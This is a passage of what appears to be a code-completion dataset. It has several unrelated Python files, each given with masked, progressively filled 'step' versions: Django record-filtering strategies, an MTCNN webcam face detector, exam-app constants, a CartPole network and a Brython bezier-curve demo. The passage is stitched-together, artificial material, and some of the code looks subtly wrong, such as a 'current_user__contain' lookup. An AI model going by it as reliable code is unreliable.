self.departments.all()\n\n def is_permitted(self, user):\n return (user.is_superuser or user.is_staff\n or self._is_dept_permitted(user.department))\n\n def __str__(self):\n return self.name_state\n\n class Meta:\n verbose_name_plural = 'Состояния'\n\n\nclass Event(models.Model):\n name_event = models.CharField('Событие', max_length=255)\n from_state = models.ForeignKey(State, on_delete=models.CASCADE,\n verbose_name='Исходное состояние',\n blank=True, null=True,\n related_name='begin_states')\n to_state = models.ForeignKey(State, on_delete=models.CASCADE,\n verbose_name='Конечное состояние',\n blank=True, null=True,\n related_name='end_states')\n is_move_backward = models.BooleanField('Двигаемся обратно назад',\n default=False)\n\n def __str__(self):\n return self.name_event\n\n class Meta:\n verbose_name_plural = 'События'\n\n##############\n# Strategies #\n##############\n\n\nclass ListStrategy(ABC):\n\n @abstractmethod\n def execute_list_strategy(self, user):\n raise NotImplementedError\n\n @abstractmethod\n def execute_single_strategy(self, pk, user):\n raise NotImplementedError\n\n\nclass OnlyEmptyRecords(ListStrategy):\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.all()\n return [c for c in contragents if not c.active_package]\n\n def execute_single_strategy(self, pk, user):\n try:\n res = Contragent.objects.get(pk=pk)\n return res if (not res.active_package) else None\n except Contragent.DoesNotExist:\n return None\n\n\nclass OnlyMyRecordsStrategy(ListStrategy):\n\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.filter(current_user__contain=user)\n return contragents\n\n def execute_single_strategy(self, pk, user):\n try:\n return Contragent.objects.get(pk=pk, current_user__contain=user)\n except Contragent.DoesNotExist:\n return None\n\n\nclass AllRecords(ListStrategy):\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.all()\n return contragents\n\n def execute_single_strategy(self, pk, user):\n try:\n return Contragent.objects.get(pk=pk)\n except Contragent.DoesNotExist:\n return None\n\n\nclass AllInDepartmentRecords(ListStrategy):\n def execute_list_strategy(self, user):\n res = list()\n contragents = Contragent.objects.all()\n for c in contragents:\n tmp_pack = c.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user.department):\n res.append(c)\n else:\n res.append(c)\n else:\n res.append(c)\n return res\n\n def execute_single_strategy(self, pk, user):\n try:\n contragent = Contragent.objects.get(pk=pk)\n tmp_pack = contragent.get_active_package()\n if tmp_pack:\n tmp_list = [c.department == user.department\n for c in contragent.current_user]\n if any(tmp_list):\n return contragent\n return None\n return contragent\n except Contragent.DoesNotExist:\n return None\n\n\nclass MyAndEmptyRecordsStrategy(ListStrategy):\n\n def execute_list_strategy(self, user):\n res = list()\n contragents = Contragent.objects.all()\n for c in contragents:\n tmp_pack = c.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user) and (\n user in c.current_user):\n res.append(c)\n else:\n res.append(c)\n else:\n res.append(c)\n return res\n\n def execute_single_strategy(self, pk, user):\n try:\n contragent = Contragent.objects.get(pk=pk)\n tmp_pack = contragent.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user) and (\n user in contragent.current_user):\n return contragent\n return contragent\n except Contragent.DoesNotExist:\n return None\n\n\nSTRATEGIES_LIST = ['Мои записи и пустые', 'Все по отделу', 'Все',\n 'Только мои записи', 'Только пустые записи']\n\nSTRATEGIES_TUPLES = list(enumerate(STRATEGIES_LIST))\n\nSTRATEGIES_FUNCTIONS = [MyAndEmptyRecordsStrategy, AllInDepartmentRecords,\n AllRecords, OnlyMyRecordsStrategy, OnlyEmptyRecords]\n\nSTRATEGIES = dict(zip(STRATEGIES_LIST, STRATEGIES_FUNCTIONS))\n\nZIP_FILES_ACTIONS = {\n 0: \"Скачать весь пакет\",\n 1: \"Скачать основные файлы\",\n 2: \"Скачать акты\",\n 3: \"Скачать счета\",\n 4: \"Скачать счета фактуры\",\n 5: \"Скачать прочие файлы\",\n}\n",
"step-ids": [
76,
93,
95,
98,
116
]
}
|
[
76,
93,
95,
98,
116
] |
# coding: utf-8
# In[1]:
import sys
sys.path.extend(['detection', 'train'])
# from detection folder
from MtcnnDetector import MtcnnDetector
from detector import Detector
from fcn_detector import FcnDetector
# from train folder
from model_factory import P_Net, R_Net, O_Net
import config as config
from preprocess.utils import iou
import cv2
import os
from os.path import join, split
import numpy as np
from tqdm import tqdm
# In[ ]:
# test_mode = config.test_mode
test_mode = 'ONet'
thresh = [0.6, 0.7, 0.9]
min_face_size = 24
stride = 2
detectors = [None, None, None]
scale_factor = 0.79
# 模型放置位置
model_path = ['model/PNet/', 'model/RNet/', 'model/ONet']
batch_size = config.batches
detectors[0] = FcnDetector(P_Net, model_path[0]) # detecotors for PNet
if test_mode in ['RNet', 'ONet']:
detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1])
if test_mode == 'ONet':
detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2])
# Use the three detectors to construct a
mtcnn_detector = MtcnnDetector(
detectors=detectors,
min_face_size=min_face_size,
stride=stride,
threshold=thresh,
scale_factor=scale_factor)
out_path = join('validate', test_mode) + '/'
if config.input_mode == '1':
#选用图片
path = config.test_dir
print(path)
for item in tqdm(os.listdir(path)):
img_path = os.path.join(path, item)
img = cv2.imread(img_path)
img_labeled = mtcnn_detector.detect_and_draw(img)
cv2.imwrite(out_path + item, img_labeled)
if config.input_mode == '2':
cap = cv2.VideoCapture(0)
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(out_path+'out.mp4', fourcc, 10, (640, 480))
while True:
t1 = cv2.getTickCount()
ret, frame = cap.read()
if ret == True:
boxes_c, landmarks = mtcnn_detector.detect(frame)
t2 = cv2.getTickCount()
t = (t2-t1)/cv2.getTickFrequency()
fps = 1.0/t
for i in range(boxes_c.shape[0]):
bbox = boxes_c[i, :4]
score = boxes_c[i, 4]
corpbbox = [int(bbox[0]), int(bbox[1]),
int(bbox[2]), int(bbox[3])]
#画人脸框
cv2.rectangle(frame, (corpbbox[0], corpbbox[1]),
(corpbbox[2], corpbbox[3]), (255, 0, 0), 1)
#画置信度
cv2.putText(frame, '{:.2f}'.format(score),
(corpbbox[0], corpbbox[1] - 2),
cv2.FONT_HERSHEY_SIMPLEX,
0.5, (0, 0, 255), 2)
#画fps值
cv2.putText(frame, '{:.4f}'.format(t) + " " + '{:.3f}'.format(fps), (10, 20),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2)
#画关键点
for i in range(landmarks.shape[0]):
for j in range(len(landmarks[i])//2):
cv2.circle(
frame, (int(landmarks[i][2*j]), int(int(landmarks[i][2*j+1]))), 2, (0, 0, 255))
a = out.write(frame)
cv2.imshow("result", frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
out.release()
cv2.destroyAllWindows()
|
normal
|
{
"blob_id": "f97a892e6e0aa258ad917c4a73a66e89b0dc3253",
"index": 267,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsys.path.extend(['detection', 'train'])\n<mask token>\nif test_mode in ['RNet', 'ONet']:\n detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1])\n if test_mode == 'ONet':\n detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2])\n<mask token>\nif config.input_mode == '1':\n path = config.test_dir\n print(path)\n for item in tqdm(os.listdir(path)):\n img_path = os.path.join(path, item)\n img = cv2.imread(img_path)\n img_labeled = mtcnn_detector.detect_and_draw(img)\n cv2.imwrite(out_path + item, img_labeled)\nif config.input_mode == '2':\n cap = cv2.VideoCapture(0)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(out_path + 'out.mp4', fourcc, 10, (640, 480))\n while True:\n t1 = cv2.getTickCount()\n ret, frame = cap.read()\n if ret == True:\n boxes_c, landmarks = mtcnn_detector.detect(frame)\n t2 = cv2.getTickCount()\n t = (t2 - t1) / cv2.getTickFrequency()\n fps = 1.0 / t\n for i in range(boxes_c.shape[0]):\n bbox = boxes_c[i, :4]\n score = boxes_c[i, 4]\n corpbbox = [int(bbox[0]), int(bbox[1]), int(bbox[2]), int(\n bbox[3])]\n cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[\n 2], corpbbox[3]), (255, 0, 0), 1)\n cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], \n corpbbox[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0,\n 255), 2)\n cv2.putText(frame, '{:.4f}'.format(t) + ' ' + '{:.3f}'.format(\n fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2\n )\n for i in range(landmarks.shape[0]):\n for j in range(len(landmarks[i]) // 2):\n cv2.circle(frame, (int(landmarks[i][2 * j]), int(int(\n landmarks[i][2 * j + 1]))), 2, (0, 0, 255))\n a = out.write(frame)\n cv2.imshow('result', frame)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n else:\n break\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n",
"step-3": "<mask token>\nsys.path.extend(['detection', 'train'])\n<mask token>\ntest_mode = 'ONet'\nthresh = [0.6, 0.7, 0.9]\nmin_face_size = 24\nstride = 2\ndetectors = [None, None, None]\nscale_factor = 0.79\nmodel_path = ['model/PNet/', 'model/RNet/', 'model/ONet']\nbatch_size = config.batches\ndetectors[0] = FcnDetector(P_Net, model_path[0])\nif test_mode in ['RNet', 'ONet']:\n detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1])\n if test_mode == 'ONet':\n detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2])\nmtcnn_detector = MtcnnDetector(detectors=detectors, min_face_size=\n min_face_size, stride=stride, threshold=thresh, scale_factor=scale_factor)\nout_path = join('validate', test_mode) + '/'\nif config.input_mode == '1':\n path = config.test_dir\n print(path)\n for item in tqdm(os.listdir(path)):\n img_path = os.path.join(path, item)\n img = cv2.imread(img_path)\n img_labeled = mtcnn_detector.detect_and_draw(img)\n cv2.imwrite(out_path + item, img_labeled)\nif config.input_mode == '2':\n cap = cv2.VideoCapture(0)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(out_path + 'out.mp4', fourcc, 10, (640, 480))\n while True:\n t1 = cv2.getTickCount()\n ret, frame = cap.read()\n if ret == True:\n boxes_c, landmarks = mtcnn_detector.detect(frame)\n t2 = cv2.getTickCount()\n t = (t2 - t1) / cv2.getTickFrequency()\n fps = 1.0 / t\n for i in range(boxes_c.shape[0]):\n bbox = boxes_c[i, :4]\n score = boxes_c[i, 4]\n corpbbox = [int(bbox[0]), int(bbox[1]), int(bbox[2]), int(\n bbox[3])]\n cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[\n 2], corpbbox[3]), (255, 0, 0), 1)\n cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], \n corpbbox[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0,\n 255), 2)\n cv2.putText(frame, '{:.4f}'.format(t) + ' ' + '{:.3f}'.format(\n fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2\n )\n for i in range(landmarks.shape[0]):\n for j in range(len(landmarks[i]) // 2):\n cv2.circle(frame, (int(landmarks[i][2 * j]), int(int(\n landmarks[i][2 * j + 1]))), 2, (0, 0, 255))\n a = out.write(frame)\n cv2.imshow('result', frame)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n else:\n break\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n",
"step-4": "import sys\nsys.path.extend(['detection', 'train'])\nfrom MtcnnDetector import MtcnnDetector\nfrom detector import Detector\nfrom fcn_detector import FcnDetector\nfrom model_factory import P_Net, R_Net, O_Net\nimport config as config\nfrom preprocess.utils import iou\nimport cv2\nimport os\nfrom os.path import join, split\nimport numpy as np\nfrom tqdm import tqdm\ntest_mode = 'ONet'\nthresh = [0.6, 0.7, 0.9]\nmin_face_size = 24\nstride = 2\ndetectors = [None, None, None]\nscale_factor = 0.79\nmodel_path = ['model/PNet/', 'model/RNet/', 'model/ONet']\nbatch_size = config.batches\ndetectors[0] = FcnDetector(P_Net, model_path[0])\nif test_mode in ['RNet', 'ONet']:\n detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1])\n if test_mode == 'ONet':\n detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2])\nmtcnn_detector = MtcnnDetector(detectors=detectors, min_face_size=\n min_face_size, stride=stride, threshold=thresh, scale_factor=scale_factor)\nout_path = join('validate', test_mode) + '/'\nif config.input_mode == '1':\n path = config.test_dir\n print(path)\n for item in tqdm(os.listdir(path)):\n img_path = os.path.join(path, item)\n img = cv2.imread(img_path)\n img_labeled = mtcnn_detector.detect_and_draw(img)\n cv2.imwrite(out_path + item, img_labeled)\nif config.input_mode == '2':\n cap = cv2.VideoCapture(0)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(out_path + 'out.mp4', fourcc, 10, (640, 480))\n while True:\n t1 = cv2.getTickCount()\n ret, frame = cap.read()\n if ret == True:\n boxes_c, landmarks = mtcnn_detector.detect(frame)\n t2 = cv2.getTickCount()\n t = (t2 - t1) / cv2.getTickFrequency()\n fps = 1.0 / t\n for i in range(boxes_c.shape[0]):\n bbox = boxes_c[i, :4]\n score = boxes_c[i, 4]\n corpbbox = [int(bbox[0]), int(bbox[1]), int(bbox[2]), int(\n bbox[3])]\n cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[\n 2], corpbbox[3]), (255, 0, 0), 1)\n cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], \n corpbbox[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0,\n 255), 2)\n cv2.putText(frame, '{:.4f}'.format(t) + ' ' + '{:.3f}'.format(\n fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2\n )\n for i in range(landmarks.shape[0]):\n for j in range(len(landmarks[i]) // 2):\n cv2.circle(frame, (int(landmarks[i][2 * j]), int(int(\n landmarks[i][2 * j + 1]))), 2, (0, 0, 255))\n a = out.write(frame)\n cv2.imshow('result', frame)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n else:\n break\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n",
"step-5": "\n# coding: utf-8\n\n# In[1]:\nimport sys\nsys.path.extend(['detection', 'train'])\n\n# from detection folder\nfrom MtcnnDetector import MtcnnDetector\nfrom detector import Detector\nfrom fcn_detector import FcnDetector\n\n# from train folder\nfrom model_factory import P_Net, R_Net, O_Net\nimport config as config\nfrom preprocess.utils import iou\n\nimport cv2\nimport os\nfrom os.path import join, split\nimport numpy as np\nfrom tqdm import tqdm\n\n# In[ ]:\n# test_mode = config.test_mode\ntest_mode = 'ONet'\nthresh = [0.6, 0.7, 0.9]\nmin_face_size = 24\nstride = 2\ndetectors = [None, None, None]\n\nscale_factor = 0.79\n\n# 模型放置位置\nmodel_path = ['model/PNet/', 'model/RNet/', 'model/ONet']\nbatch_size = config.batches\n\ndetectors[0] = FcnDetector(P_Net, model_path[0]) # detecotors for PNet\nif test_mode in ['RNet', 'ONet']:\n detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1])\n\n if test_mode == 'ONet':\n detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2])\n\n# Use the three detectors to construct a \nmtcnn_detector = MtcnnDetector(\n detectors=detectors,\n min_face_size=min_face_size,\n stride=stride,\n threshold=thresh,\n scale_factor=scale_factor)\n\n\nout_path = join('validate', test_mode) + '/'\n\nif config.input_mode == '1':\n #选用图片\n path = config.test_dir\n print(path)\n for item in tqdm(os.listdir(path)):\n img_path = os.path.join(path, item)\n img = cv2.imread(img_path)\n img_labeled = mtcnn_detector.detect_and_draw(img)\n\n cv2.imwrite(out_path + item, img_labeled)\n\nif config.input_mode == '2':\n cap = cv2.VideoCapture(0)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(out_path+'out.mp4', fourcc, 10, (640, 480))\n while True:\n t1 = cv2.getTickCount()\n ret, frame = cap.read()\n if ret == True:\n boxes_c, landmarks = mtcnn_detector.detect(frame)\n t2 = cv2.getTickCount()\n t = (t2-t1)/cv2.getTickFrequency()\n fps = 1.0/t\n for i in range(boxes_c.shape[0]):\n bbox = boxes_c[i, :4]\n score = boxes_c[i, 4]\n corpbbox = [int(bbox[0]), int(bbox[1]),\n int(bbox[2]), int(bbox[3])]\n\n #画人脸框\n cv2.rectangle(frame, (corpbbox[0], corpbbox[1]),\n (corpbbox[2], corpbbox[3]), (255, 0, 0), 1)\n #画置信度\n cv2.putText(frame, '{:.2f}'.format(score),\n (corpbbox[0], corpbbox[1] - 2),\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.5, (0, 0, 255), 2)\n #画fps值\n cv2.putText(frame, '{:.4f}'.format(t) + \" \" + '{:.3f}'.format(fps), (10, 20),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2)\n #画关键点\n for i in range(landmarks.shape[0]):\n for j in range(len(landmarks[i])//2):\n cv2.circle(\n frame, (int(landmarks[i][2*j]), int(int(landmarks[i][2*j+1]))), 2, (0, 0, 255))\n a = out.write(frame)\n cv2.imshow(\"result\", frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n break\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# !/usr/bin/env python
# coding: utf-8
__author__ = 'zhouhenglc'
TIME_FORMAT = '%Y-%m-%d %H:%M:%S'
ENCODING = 'utf-8'
# exam mode
# G_SELECT_MODE
# 待废弃,逐步完善使用classes.objects.question_type
# G_SELECT_MODE = ["无", "选择题", "名词解释", "简答题", "计算题", "论述题", "多选题", "判断题"]
G_MULTI_MODE = [6, ] # 多选题型 多选题=6
# G_DEF_OPTIONS = [1, 6] # 自定义选项 单选题=1 多选题=6
# exam status
STATUS_ONLINE = 64
STATUS_OFFLINE = 128
# token error
TOKEN_BAD_FORMAT = 'token_bad_format' # login again
TOKEN_EXPIRED = 'token_expired' # try refresh
TOKEN_NOT_STORAGE = 'token_not_storage' # login again
TOKEN_REQUIRE_REFRESH = 'token_require_refresh' # try refresh
# training question state
T_STATE_RIGHT = 'right'
T_STATE_WRONG = 'wrong'
T_STATE_SKIP = 'skip'
T_STATES = [T_STATE_RIGHT, T_STATE_WRONG, T_STATE_SKIP]
# resource constants
R_EXAM = 'exam'
R_QUESTION = 'question'
R_VC = 'virtual_currency'
R_SE = 'security'
# resource event
E_AFTER_UPDATE = 'after_update'
E_GEN_TOKEN = 'gen_token'
E_PARSING_TOKEN = 'parsing_token'
E_NEW_BILLING = 'new_billing'
E_SE_FIREWALL = 'security_firewall'
# vc billing
VB_FB = 'feedback_exam'
VB_FB_NAME = '题库问题反馈得积分'
VC_EC_EM = 'vc_exchange_exam_mem'
VC_EC_EM_NAME = '积分换题库会员'
# security handle action
SE_ACTION_NORMAL = 'normal'
SE_ACTION_WARN = 'warn'
SE_ACTION_EXIT = 'exit'
# DATA_REGISTRY keys
DR_KEY_VC_GOODS = 'vc_goods'
DR_KEY_ROUTES = 'routes'
# goods type
GOOD_TYPE_EXAM = 'exam'
|
normal
|
{
"blob_id": "4605a3f88c73b43fa7611a10a400ad2d4d7c6dfc",
"index": 2273,
"step-1": "<mask token>\n",
"step-2": "__author__ = 'zhouhenglc'\nTIME_FORMAT = '%Y-%m-%d %H:%M:%S'\nENCODING = 'utf-8'\nG_MULTI_MODE = [6]\nSTATUS_ONLINE = 64\nSTATUS_OFFLINE = 128\nTOKEN_BAD_FORMAT = 'token_bad_format'\nTOKEN_EXPIRED = 'token_expired'\nTOKEN_NOT_STORAGE = 'token_not_storage'\nTOKEN_REQUIRE_REFRESH = 'token_require_refresh'\nT_STATE_RIGHT = 'right'\nT_STATE_WRONG = 'wrong'\nT_STATE_SKIP = 'skip'\nT_STATES = [T_STATE_RIGHT, T_STATE_WRONG, T_STATE_SKIP]\nR_EXAM = 'exam'\nR_QUESTION = 'question'\nR_VC = 'virtual_currency'\nR_SE = 'security'\nE_AFTER_UPDATE = 'after_update'\nE_GEN_TOKEN = 'gen_token'\nE_PARSING_TOKEN = 'parsing_token'\nE_NEW_BILLING = 'new_billing'\nE_SE_FIREWALL = 'security_firewall'\nVB_FB = 'feedback_exam'\nVB_FB_NAME = '题库问题反馈得积分'\nVC_EC_EM = 'vc_exchange_exam_mem'\nVC_EC_EM_NAME = '积分换题库会员'\nSE_ACTION_NORMAL = 'normal'\nSE_ACTION_WARN = 'warn'\nSE_ACTION_EXIT = 'exit'\nDR_KEY_VC_GOODS = 'vc_goods'\nDR_KEY_ROUTES = 'routes'\nGOOD_TYPE_EXAM = 'exam'\n",
"step-3": "# !/usr/bin/env python\n# coding: utf-8\n\n\n__author__ = 'zhouhenglc'\n\n\nTIME_FORMAT = '%Y-%m-%d %H:%M:%S'\nENCODING = 'utf-8'\n\n\n# exam mode\n# G_SELECT_MODE\n# 待废弃,逐步完善使用classes.objects.question_type\n# G_SELECT_MODE = [\"无\", \"选择题\", \"名词解释\", \"简答题\", \"计算题\", \"论述题\", \"多选题\", \"判断题\"]\nG_MULTI_MODE = [6, ] # 多选题型 多选题=6\n# G_DEF_OPTIONS = [1, 6] # 自定义选项 单选题=1 多选题=6\n\n# exam status\nSTATUS_ONLINE = 64\nSTATUS_OFFLINE = 128\n\n# token error\nTOKEN_BAD_FORMAT = 'token_bad_format' # login again\nTOKEN_EXPIRED = 'token_expired' # try refresh\nTOKEN_NOT_STORAGE = 'token_not_storage' # login again\nTOKEN_REQUIRE_REFRESH = 'token_require_refresh' # try refresh\n\n\n# training question state\nT_STATE_RIGHT = 'right'\nT_STATE_WRONG = 'wrong'\nT_STATE_SKIP = 'skip'\nT_STATES = [T_STATE_RIGHT, T_STATE_WRONG, T_STATE_SKIP]\n\n\n# resource constants\nR_EXAM = 'exam'\nR_QUESTION = 'question'\nR_VC = 'virtual_currency'\nR_SE = 'security'\n\n\n# resource event\nE_AFTER_UPDATE = 'after_update'\nE_GEN_TOKEN = 'gen_token'\nE_PARSING_TOKEN = 'parsing_token'\nE_NEW_BILLING = 'new_billing'\nE_SE_FIREWALL = 'security_firewall'\n\n\n# vc billing\nVB_FB = 'feedback_exam'\nVB_FB_NAME = '题库问题反馈得积分'\nVC_EC_EM = 'vc_exchange_exam_mem'\nVC_EC_EM_NAME = '积分换题库会员'\n\n\n# security handle action\nSE_ACTION_NORMAL = 'normal'\nSE_ACTION_WARN = 'warn'\nSE_ACTION_EXIT = 'exit'\n\n\n# DATA_REGISTRY keys\nDR_KEY_VC_GOODS = 'vc_goods'\nDR_KEY_ROUTES = 'routes'\n\n\n# goods type\nGOOD_TYPE_EXAM = 'exam'\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# Neural network model(s) for the pygym 'CartPoleEnv'
#
# author: John Welsh
import torch.nn as nn
import torch.nn.functional as F
class CartPoleModel(nn.Module):
def __init__(self):
super(CartPoleModel, self).__init__()
self.fc1 = nn.Linear(4, 60)
self.fc2 = nn.Linear(60, 120)
self.fc3 = nn.Linear(120, 2)
def forward(self, x):
x = F.tanh(self.fc1(x))
x = F.tanh(self.fc2(x))
x = self.fc3(x)
return x
|
normal
|
{
"blob_id": "bde3975f5b614a4b00ad392d9f0b4c1bd8c55dc0",
"index": 6855,
"step-1": "<mask token>\n\n\nclass CartPoleModel(nn.Module):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass CartPoleModel(nn.Module):\n\n def __init__(self):\n super(CartPoleModel, self).__init__()\n self.fc1 = nn.Linear(4, 60)\n self.fc2 = nn.Linear(60, 120)\n self.fc3 = nn.Linear(120, 2)\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass CartPoleModel(nn.Module):\n\n def __init__(self):\n super(CartPoleModel, self).__init__()\n self.fc1 = nn.Linear(4, 60)\n self.fc2 = nn.Linear(60, 120)\n self.fc3 = nn.Linear(120, 2)\n\n def forward(self, x):\n x = F.tanh(self.fc1(x))\n x = F.tanh(self.fc2(x))\n x = self.fc3(x)\n return x\n",
"step-4": "import torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass CartPoleModel(nn.Module):\n\n def __init__(self):\n super(CartPoleModel, self).__init__()\n self.fc1 = nn.Linear(4, 60)\n self.fc2 = nn.Linear(60, 120)\n self.fc3 = nn.Linear(120, 2)\n\n def forward(self, x):\n x = F.tanh(self.fc1(x))\n x = F.tanh(self.fc2(x))\n x = self.fc3(x)\n return x\n",
"step-5": "# Neural network model(s) for the pygym 'CartPoleEnv'\n#\n# author: John Welsh\n\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass CartPoleModel(nn.Module):\n\n def __init__(self):\n super(CartPoleModel, self).__init__()\n self.fc1 = nn.Linear(4, 60)\n self.fc2 = nn.Linear(60, 120)\n self.fc3 = nn.Linear(120, 2)\n\n def forward(self, x):\n x = F.tanh(self.fc1(x))\n x = F.tanh(self.fc2(x))\n x = self.fc3(x)\n return x\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from javascript import JSConstructor
from javascript import JSObject
cango = JSConstructor(Cango2D)
shapes2d = JSObject(shapes2D)
tweener = JSConstructor(Tweener)
drag2d = JSConstructor(Drag2D)
svgtocgo2d = JSConstructor(svgToCgo2D)
cgo = cango("plotarea")
x1, y1 = 40, 20
cx1, cy1 = 90, 120
x2, y2 = 120, 100
cx2, cy2 = 130, 20
cx3, cy3 = 150, 120
x3, y3 = 180, 60
#called in scope of dragNdrop obj
def dragC1(mousePos):
global cx1, cy1
cx1 = mousePos.x
cy1 = mousePos.y
drawCurve()
def dragC2(mousePos):
global cx2, cy2
cx2 = mousePos.x
cy2 = mousePos.y
drawCurve()
def dragC3(mousePos):
global cx3, cy3
cx3 = mousePos.x
cy3 = mousePos.y
drawCurve()
def drawCurve():
# curve change shape so it must be re-compiled each time
# draw a quadratic bezier from x1,y2 to x2,y2
qbezdata = ['M', x1, y1, 'Q', cx1, cy1, x2, y2]
qbez = cgo.compilePath(qbezdata, 'blue')
cbezdata = ['M', x2, y2, 'C', cx2, cy2, cx3, cy3, x3, y3]
cbez = cgo.compilePath(cbezdata, 'green')
# show lines to control point
data = ['M', x1, y1, 'L', cx1, cy1, x2, y2]
# semi-transparent gray
L1 = cgo.compilePath(data, "rgba(0, 0, 0, 0.2)")
data = ['M', x2, y2, 'L', cx2, cy2]
L2 = cgo.compilePath(data, "rgba(0, 0, 0, 0.2)")
data = ['M', x3, y3, 'L', cx3, cy3]
L3 = cgo.compilePath(data, "rgba(0, 0, 0, 0.2)")
# draw draggable control points
c1.transform.reset()
c1.transform.translate(cx1, cy1)
c2.transform.reset()
c2.transform.translate(cx2, cy2)
c3.transform.reset()
c3.transform.translate(cx3, cy3)
grp = cgo.createGroup2D(qbez, cbez, L1, L2, L3, c1, c2, c3)
cgo.renderFrame(grp)
cgo.clearCanvas("lightyellow")
cgo.setWorldCoords(0, 0, 200)
# pre-compile the draggable control point
dragObj1 = drag2d(cgo, null, dragC1, null)
c1 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)
c1.enableDrag(dragObj1)
dragObj2 = drag2d(cgo, null, dragC2, null)
c2 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)
c2.enableDrag(dragObj2)
dragObj3 = drag2d(cgo, null, dragC3, null)
c3 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)
c3.enableDrag(dragObj3)
drawCurve()
|
normal
|
{
"blob_id": "3b19ee0bbd24b76dd8b933859f6a56c459926861",
"index": 5615,
"step-1": "<mask token>\n\n\ndef dragC2(mousePos):\n global cx2, cy2\n cx2 = mousePos.x\n cy2 = mousePos.y\n drawCurve()\n\n\ndef dragC3(mousePos):\n global cx3, cy3\n cx3 = mousePos.x\n cy3 = mousePos.y\n drawCurve()\n\n\ndef drawCurve():\n qbezdata = ['M', x1, y1, 'Q', cx1, cy1, x2, y2]\n qbez = cgo.compilePath(qbezdata, 'blue')\n cbezdata = ['M', x2, y2, 'C', cx2, cy2, cx3, cy3, x3, y3]\n cbez = cgo.compilePath(cbezdata, 'green')\n data = ['M', x1, y1, 'L', cx1, cy1, x2, y2]\n L1 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n data = ['M', x2, y2, 'L', cx2, cy2]\n L2 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n data = ['M', x3, y3, 'L', cx3, cy3]\n L3 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n c1.transform.reset()\n c1.transform.translate(cx1, cy1)\n c2.transform.reset()\n c2.transform.translate(cx2, cy2)\n c3.transform.reset()\n c3.transform.translate(cx3, cy3)\n grp = cgo.createGroup2D(qbez, cbez, L1, L2, L3, c1, c2, c3)\n cgo.renderFrame(grp)\n\n\n<mask token>\n",
